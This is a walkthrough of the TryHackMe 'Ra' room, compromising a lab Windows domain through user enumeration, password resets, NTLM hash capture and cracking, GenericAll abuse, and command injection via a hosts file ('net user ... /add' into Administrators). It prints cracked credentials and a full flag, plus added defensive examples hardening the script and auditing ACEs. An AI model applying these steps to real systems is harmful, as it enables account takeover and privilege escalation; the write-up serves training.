RA
URL : https://tryhackme.com/room/ra
Background Story:
You have gained access to the internal network of WindCorp, the multibillion-dollar company running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new Windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
Happy Hacking!
As always, let’s start off with nmap to see which ports are open on the box.
Nmap
# Nmap 7.80 scan initiated Mon Oct 4 10:05:30 2021 as: /usr/bin/nmap -p- --max-retries 1 --max-rate 500 --max-scan-delay 20 -T4 -v --open -oN nmap/Full_10.10.228.182.nmap --system-dns --stats-every 3s 10.10.228.182
Warning: 10.10.228.182 giving up on port because retransmission cap hit (1).
Nmap scan report for fire.windcorp.thm (10.10.228.182)
Host is up (0.17s latency).
Not shown: 65499 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2179/tcp open vmrdp
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5229/tcp open jaxflow
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
5985/tcp open wsman
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9090/tcp open zeus-admin
9091/tcp open xmltec-xmlmail
9389/tcp open adws
49670/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49748/tcp open unknown
49938/tcp open unknown
Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Oct 4 10:10:30 2021 -- 1 IP address (1 host up) scanned in 299.27 seconds
Recon
Port 389
namingContexts from ldapsearch
Domain : windcorp.thm
kali ~/ctf/tryhackme/Ra ldapsearch -h 10.10.228.182 -x -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=windcorp,DC=thm
namingContexts: CN=Configuration,DC=windcorp,DC=thm
namingContexts: CN=Schema,CN=Configuration,DC=windcorp,DC=thm
namingContexts: DC=ForestDnsZones,DC=windcorp,DC=thm
namingContexts: DC=DomainDnsZones,DC=windcorp,DC=thm
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Port 445
kali ~/ctf/tryhackme/Ra 2 crackmapexec smb windcorp.thm -u "" -p ""
SMB 10.10.228.182 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.228.182 445 FIRE [-] windcorp.thm\: STATUS_ACCESS_DENIED
Port 80
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicfish718@fire.windcorp.thm"> <a href="xmpp:organicfish718@fire.windcorp.thm">Antonietta Vidal</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicwolf509@fire.windcorp.thm"> <a href="xmpp:organicwolf509@fire.windcorp.thm">Britney Palmer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinywolf424@fire.windcorp.thm"> <a href="xmpp:tinywolf424@fire.windcorp.thm">Brittany Cruz</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=angrybird253@fire.windcorp.thm"> <a href="xmpp:angrybird253@fire.windcorp.thm">Carla Meyer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=buse@fire.windcorp.thm"> <a href="xmpp:buse@fire.windcorp.thm">Buse Candan</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edeltraut@fire.windcorp.thm"><a href="xmpp:Edeltraut@fire.windcorp.thm"> Edeltraut Daub</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edward@fire.windcorp.thm"><a href="xmpp:Edward@fire.windcorp.thm"> Edward Lewis</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Emile@fire.windcorp.thm"><a href="xmpp:Emile@fire.windcorp.thm"> Emile Lavoie</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinygoose102@fire.windcorp.thm"><a href="xmpp:tinygoose102@fire.windcorp.thm"> Emile Henry</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=brownostrich284@fire.windcorp.thm"><a href="xmpp:brownostrich284@fire.windcorp.thm"> Emily Anderson</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=sadswan869@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Hemmo Boschma</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=goldencat416@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Isabella Hughes</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=whiteleopard529@fire.windcorp.thm"><a href="xmpp:whiteleopard529@fire.windcorp.thm"> Isra Saur</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=happymeercat399@fire.windcorp.thm"><a href="xmpp:happymeercat399@fire.windcorp.thm"> Jackson Vasquez</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=orangegorilla428@fire.windcorp.thm"><a href="xmpp:orangegorilla428@fire.windcorp.thm"> Jaqueline Dittmer</a></li>
cat emails-web.txt | awk -F "jid=" '{print $2}' | awk -F "\">" '{ print $1 }' | tee emails.txt
organicfish718@fire.windcorp.thm
organicwolf509@fire.windcorp.thm
tinywolf424@fire.windcorp.thm
angrybird253@fire.windcorp.thm
buse@fire.windcorp.thm
Edeltraut@fire.windcorp.thm
Edward@fire.windcorp.thm
Emile@fire.windcorp.thm
tinygoose102@fire.windcorp.thm
brownostrich284@fire.windcorp.thm
sadswan869@fire.windcorp.thm
goldencat416@fire.windcorp.thm
whiteleopard529@fire.windcorp.thm
happymeercat399@fire.windcorp.thm
orangegorilla428@fire.windcorp.thm
cat emails-web.txt | awk -F "jid=" '{print $2}' | awk -F "\">" '{ print $1 }' | awk -F '@' '{ print $1}' | tee users.txt
organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
goldencat416
whiteleopard529
happymeercat399
orangegorilla428
On the main web page, several employees are pictured with a puppy. The employee's image file is named after the pet, Sparky.
Adding lilyle to our users.txt file and performing user enumeration against Active Directory to see whether these users exist in the domain.
Port 88
Kerbrute
kali ~/ctf/tryhackme/Ra /opt/tools/kerbrute userenum -d windcorp.thm --dc windcorp.thm users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/04/21 - Ronnie Flathers @ropnop
2021/10/04 11:21:02 > Using KDC(s):
2021/10/04 11:21:02 > windcorp.thm:88
2021/10/04 11:21:03 > [+] VALID USERNAME: angrybird253@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: buse@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: Emile@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: tinygoose102@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: Edward@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: brownostrich284@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: organicfish718@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: Edeltraut@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: whiteleopard529@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: goldencat416@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: sadswan869@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: orangegorilla428@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: happymeercat399@windcorp.thm
2021/10/04 11:21:03 > [+] VALID USERNAME: lilyle@windcorp.thm
2021/10/04 10:35:20 > Done! Tested 15 usernames (13 valid) in 0.354 seconds
The user lilyle exists in the Active Directory domain.
Resetting the password of user lilyle using the security question (pet name).
user: lilyle pass: ChangeMe#1234
GetNPUsers.py
kali ~/ctf/tryhackme/Ra GetNPUsers.py -outputfile out.txt -usersfile users.txt -no-pass -dc-ip windcorp.thm windcorp.thm/
/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography import utils, x509
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User organicfish718 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User angrybird253 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User buse doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Edeltraut doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Edward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Emile doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tinygoose102 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User brownostrich284 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sadswan869 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User goldencat416 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User whiteleopard529 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User happymeercat399 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User orangegorilla428 doesn't have UF_DONT_REQUIRE_PREAUTH set
None of the users has UF_DONT_REQUIRE_PREAUTH set, so Kerberos pre-authentication is required for all of them.
Checking the credentials with SMB.
Flag 1: THM{466d52dc75a277d6…..}
LdapDomainDump
kali ~/ctf/tryhackme/Ra 1 ldapdomaindump -u 'windcorp.thm\lilyle' -p 'ChangeMe#1234' -o ldap windcorp.thm
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
[Screenshots of the ldapdomaindump output: domain users, IT group, SMB users, more users]
kali ~/ctf/tryhackme/Ra/spark sudo dpkg -i spark_2_8_3.deb
[sudo] password for kali:
Selecting previously unselected package spark-messenger.
(Reading database ... 528511 files and directories currently installed.)
Preparing to unpack spark_2_8_3.deb ...
Unpacking spark-messenger (2.8.3) ...
Setting up spark-messenger (2.8.3) ...
Processing triggers for kali-menu (2020.3.2) ...
User
https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
[HTTP] NTLMv2 Client : 10.10.228.182
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:0b8a2d804296d785:3D175E1842BC653F616A43C550486723:0101000000000000916F9306F9B8D701D56215B0B29B4DED000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000001000000002000006D54EB32A1E678F03F198B0720747D714769132058AF95F68E1890E4B7AC541E0A00100000000000000000000000000000000000090000000000000000000000
Now let’s crack the hash using hashcat in NetNTLMv2 mode (-m 5600).
kali ~/ctf/tryhackme/Ra hashcat -a 0 -m 5600 hash.txt /opt/rockyou.txt
hashcat (v6.0.0) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2660 v4 @ 2.00GHz, 5852/5916 MB (2048 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 66 MB
Dictionary cache hit:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
BUSE::WINDCORP:0b8a2d804296d785:3d175e1842bc653f616a43c550486723:0101000000000000916f9306f9b8d701d56215b0b29b4ded000000000200060053004d0042000100160053004d0042002d0054004f004f004c004b00490054000400120073006d0062002e006c006f00630061006c000300280073006500720076006500720032003000300033002e0073006d0062002e006c006f00630061006c000500120073006d0062002e006c006f00630061006c0008003000300000000000000001000000002000006d54eb32a1e678f03f198b0720747d714769132058af95f68e1890e4b7ac541e0a00100000000000000000000000000000000000090000000000000000000000:uzunLM+3131
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:0b8a2d804296d785:3d175e1842bc653f616...000000
Time.Started.....: Mon Oct 4 13:55:38 2021 (3 secs)
Time.Estimated...: Mon Oct 4 13:55:41 2021 (0 secs)
Guess.Base.......: File (/opt/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 991.9 kH/s (3.08ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2965504/14344384 (20.67%)
Rejected.........: 0/2965504 (0.00%)
Restore.Point....: 2957312/14344384 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v1001371 -> usher272
Started: Mon Oct 4 13:55:19 2021
Stopped: Mon Oct 4 13:55:44 2021
User: buse
Password: uzunLM+3131
Flag 2: THM{6f690fc72b9ae8dc25a24a1……xxx}
SharpHound - BloodHound
Uploaded SharpHound.ps1 to the target and ran the collector with buse's credentials:
invoke-bloodhound -collectionmethod all -domain windcorp.thm -LDAPUser buse -LDAPPass uzunLM+3131
Root
Searching through the directories, I found a scripts folder containing a PowerShell script.
*Evil-WinRM* PS C:\Users\buse\Documents> cd ../
*Evil-WinRM* PS C:\Users\buse> cd ../..
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/2/2020 6:33 AM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 5/8/2020 7:43 AM Program Files
d----- 5/7/2020 2:51 AM Program Files (x86)
d----- 5/3/2020 5:48 AM scripts
d----- 5/29/2020 5:45 PM Shared
d-r--- 5/2/2020 3:05 PM Users
d----- 5/30/2020 7:00 AM Windows
*Evil-WinRM* PS C:\> cd scripts
*Evil-WinRM* PS C:\scripts> dir
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 10/4/2021 2:23 AM 31 log.txt
*Evil-WinRM* PS C:\scripts> type log.txt
Last run: 10/04/2021 02:23:27
*Evil-WinRM* PS C:\scripts> type checkservers.ps1
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"
# start looping here
Do{
$available = $Null
$notavailable = $Null
Write-Host (Get-Date)
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
if($p)
{
# if the Host is available then just write it to the screen
write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
[Array]$available += $_
}
else
{
# If the host is unavailable, give a warning to screen
write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
$p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
if(!($p))
{
# If the host is still unavailable for 4 full pings, write error and send email
write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
[Array]$notavailable += $_
if ($OutageHosts -ne $Null)
{
if (!$OutageHosts.ContainsKey($_))
{
# First time down add to the list and send email
Write-Host "$_ Is not in the OutageHosts list, first time down"
$OutageHosts.Add($_,(get-date))
$Now = Get-date
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
else
{
# If the host is in the list do nothing for 1 hour and then remove from the list.
Write-Host "$_ Is in the OutageHosts list"
if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
{$OutageHosts.Remove($_)}
}
}
else
{
# First time down create the list and send email
Write-Host "Adding $_ to OutageHosts."
$OutageHosts = @{$_=(get-date)}
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
}
}
}
# Report to screen the details
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count
Write-Host "Not available count:"$notavailable.count
Write-Host "Not available hosts:"
$OutageHosts
Write-Host ""
Write-Host "Sleeping $SleepTimeOut seconds"
sleep $SleepTimeOut
if ($OutageHosts.Count -gt $MaxOutageCount)
{
# If there are more than a certain number of host down in an hour abort the script.
$Exit = $True
$body = $OutageHosts | Out-String
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
}
}
while ($Exit -ne $True)
Going through the source code, checkservers.ps1 tests the connection to every host listed in C:\Users\brittanycr\hosts.txt. Each line of that file is interpolated into a command string that is then run through Invoke-Expression, so the script executes whatever the file contains.
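The defect that makes checkservers.ps1 dangerous is that file content is turned into code: the host name is spliced into a string and handed to Invoke-Expression (note also that $p holds the command string rather than its result, so the if($p) branch is always taken). The following is an added example, not the room's script, that shows the same pattern next to a hardened rewrite: every entry is validated as a host name or IPv4 literal and passed to Test-Connection as a parameter argument, and the script refuses to run if the hosts file is writable by anyone other than SYSTEM or Administrators. The file path is the one from the room, reused as example input.

```powershell
# Added example, not the room's checkservers.ps1. File path is a placeholder.

# --- Vulnerable pattern (as in checkservers.ps1): the line is spliced into a
#     command string and evaluated, so a line containing ";" runs commands. ---
function Test-HostsUnsafe {
    param([Parameter(Mandatory)][string]$HostFile)
    Get-Content -LiteralPath $HostFile | Where-Object { $_ -notmatch '#' } | ForEach-Object {
        $p = "Test-Connection -ComputerName $_ -Count 1 -ErrorAction SilentlyContinue"
        Invoke-Expression $p      # untrusted data becomes code
    }
}

# --- Hardened: only well-formed host names / IPv4 literals are accepted, and the
#     value is passed as a parameter argument, never parsed by the shell. ---
function Test-HostsSafe {
    param([Parameter(Mandatory)][string]$HostFile)

    # One DNS label, or dotted labels (covers IPv4 literals too); nothing else.
    $validHost = '^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'

    foreach ($line in Get-Content -LiteralPath $HostFile) {
        $entry = $line.Trim()
        if ($entry -eq '' -or $entry.StartsWith('#')) { continue }

        if ($entry -notmatch $validHost) {
            # Log and skip: a line such as ";net user ..." ends up here instead of executing.
            Write-Warning "hosts file contains a malformed entry, skipping: '$entry'"
            [pscustomobject]@{ Host = $entry; Status = 'Rejected' }
            continue
        }

        $up = Test-Connection -ComputerName $entry -Count 1 -Quiet -ErrorAction SilentlyContinue
        [pscustomobject]@{ Host = $entry; Status = $(if ($up) { 'Up' } else { 'Down' }) }
    }
}

# --- Guard: list Allow ACEs that grant any write right on the hosts file to a
#     principal other than SYSTEM or Administrators. A writable input file is
#     exactly what the injection in the room relied on. ---
function Get-UnexpectedWriters {
    param([Parameter(Mandatory)][string]$Path)
    $writeBits = [System.Security.AccessControl.FileSystemRights]::Write
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ([int]($_.FileSystemRights -band $writeBits)) -ne 0 -and
        $_.IdentityReference.Value -notin @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    } | Select-Object IdentityReference, FileSystemRights, IsInherited
}

$hostFile = 'C:\Users\brittanycr\hosts.txt'   # path from the room, used as example input
$writers  = Get-UnexpectedWriters -Path $hostFile
if ($writers) {
    Write-Error "Refusing to run: $hostFile is writable by: $($writers.IdentityReference -join ', ')"
    return
}
Test-HostsSafe -HostFile $hostFile | Format-Table -AutoSize
```

The validation regex deliberately rejects anything that is not a plain host name or dotted address, so a poisoned line is logged and skipped rather than executed; the ACL guard turns the "who can write the input file" question, which BloodHound answered for the attacker in this room, into a precondition the scheduled task checks before doing any work.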
But unfortunately we don’t have permission to write to the hosts.txt file. Let’s go back to BloodHound, set the start node as buse and the end node as brittanycr, and see what relationships we have on the user.
We have GenericAll permissions on the brittanycr user. Let’s try resetting the password for the user.
*Evil-WinRM* PS C:\Users\buse\downloads> net user brittanycr NewPassword123 /domain
The command completed successfully.
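The reset above works only because buse holds GenericAll over the brittanycr object, the edge BloodHound surfaced. From the defender's side that ACE is the thing to find and remove. The following added example (not part of the room or its tooling) lists Allow ACEs on a user object that grant GenericAll, WriteDacl or WriteOwner to any principal outside an expected list. It assumes the ActiveDirectory RSAT module is installed, so that the AD: drive exists, and a domain-joined session with read access; the account name and the expected-principal list are parameters.

```powershell
# Added example, not from the room. Requires the ActiveDirectory module (RSAT) so
# that the AD: drive exists; run from a domain-joined session with read access.
Import-Module ActiveDirectory

function Get-RiskyUserAces {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        # Principals expected to hold full control over user objects. Tune per environment.
        [string[]]$ExpectedPrincipals = @('SYSTEM', 'Administrators', 'Domain Admins',
                                          'Enterprise Admins', 'Account Operators')
    )
    $user = Get-ADUser -Identity $SamAccountName
    $acl  = Get-Acl -Path ("AD:\" + $user.DistinguishedName)

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Rights that allow taking over the object: full control, or rewriting its DACL/owner.
        $rights = $ace.ActiveDirectoryRights.ToString()
        if ($rights -notmatch 'GenericAll|WriteDacl|WriteOwner') { continue }
        # Strip the domain prefix ("WINDCORP\buse" -> "buse") before comparing.
        $who = ($ace.IdentityReference.Value -split '\\')[-1]
        if ($who -in $ExpectedPrincipals) { continue }

        [pscustomobject]@{
            Target    = $user.SamAccountName
            Principal = $ace.IdentityReference.Value
            Rights    = $rights
            Inherited = $ace.IsInherited
        }
    }
}

# Usage: one user (the target from the room), or every enabled user in the domain.
Get-RiskyUserAces -SamAccountName 'brittanycr' | Format-Table -AutoSize
# Get-ADUser -Filter 'Enabled -eq $true' |
#     ForEach-Object { Get-RiskyUserAces -SamAccountName $_.SamAccountName }
```

An explicit (non-inherited) GenericAll grant from one ordinary user to another, which is what the room relies on, has no routine justification and is the first row to investigate. A flagged ACE is removed by calling RemoveAccessRule on the ACL object and writing it back with Set-Acl, once it is confirmed that no legitimate process depends on it.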
Evil-WinRM could not connect with the changed credentials. Let’s try connecting over SMB instead.
smb: \> cd brittanycr
smb: \brittanycr\> dir
. D 0 Sun May 3 05:06:46 2020
.. D 0 Sun May 3 05:06:46 2020
hosts.txt A 22 Sun May 3 19:14:57 2020
15587583 blocks of size 4096. 10912692 blocks available
smb: \brittanycr\> get hosts.txt
getting file \brittanycr\hosts.txt of size 22 as hosts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \brittanycr\>
16:03:23.479338 IP 10.10.111.236 > 10.9.48.164: ICMP echo request, id 1, seq 67, length 40
16:03:23.479405 IP 10.9.48.164 > 10.10.111.236: ICMP echo reply, id 1, seq 67, length 40
We get an ICMP echo request from the server to our machine.
Now we need to add our payload to the hosts file, terminating the command with ;
;net user tinyboy hello!123 /add;net localgroup Administrators tinyboy /add
Upload the updated hosts file.
kali ~/ctf/tryhackme/Ra crackmapexec smb windcorp.thm -u tinyboy -p 'hello!123'
SMB 10.10.111.236 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.111.236 445 FIRE [+] windcorp.thm\tinyboy:hello!123 (Pwn3d!)
We have successfully added ourselves as a user, and we are in the Administrators group.
*Evil-WinRM* PS C:\Users> cd Administrator/
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2020 1:22 AM 47 Flag3.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type Flag3.txt
THM{ba3a2bff2e535b514ad760c283890faae54ac2ef}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Flag 3: THM{ba3a2bff2e535b514a…….xxxxx}